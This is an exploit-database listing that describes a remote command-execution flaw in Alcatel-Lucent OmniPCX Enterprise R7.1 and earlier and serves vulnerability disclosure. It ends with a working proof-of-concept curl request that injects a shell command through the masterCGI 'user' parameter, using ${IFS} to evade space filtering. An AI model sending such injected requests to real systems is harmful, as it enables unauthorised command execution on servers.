header-logo
Suggest Exploit
vendor:
OmniPCX Enterprise
by:
7.5
CVSS
HIGH
Remote Command Execution
CWE
Product Name: OmniPCX Enterprise
Affected Version From: R7.1 and prior versions
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

Alcatel-Lucent OmniPCX Enterprise Remote Command Execution Vulnerability

Alcatel-Lucent OmniPCX Enterprise is prone to a remote command-execution vulnerability because it fails to adequately sanitize user-supplied data. Attackers can exploit this issue to execute arbitrary commands with the privileges of the 'httpd' user. Successful attacks may facilitate a compromise of the application and underlying webserver; other attacks are also possible.

Mitigation:

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/25694/info

Alcatel-Lucent OmniPCX Enterprise is prone to a remote command-execution vulnerability because it fails to adequately sanitize user-supplied data.

Attackers can exploit this issue to execute arbitrary commands with the privileges of the 'httpd' user. Successful attacks may facilitate a compromise of the application and underlying webserver; other attacks are also possible.

Alcatel-Lucent OmniPCX Enterprise R7.1 and prior versions are vulnerable to this issue. 

curl -k "https://www.example.com/cgi-bin/masterCGI?ping=nomip&user=;ls\${IFS}-l;"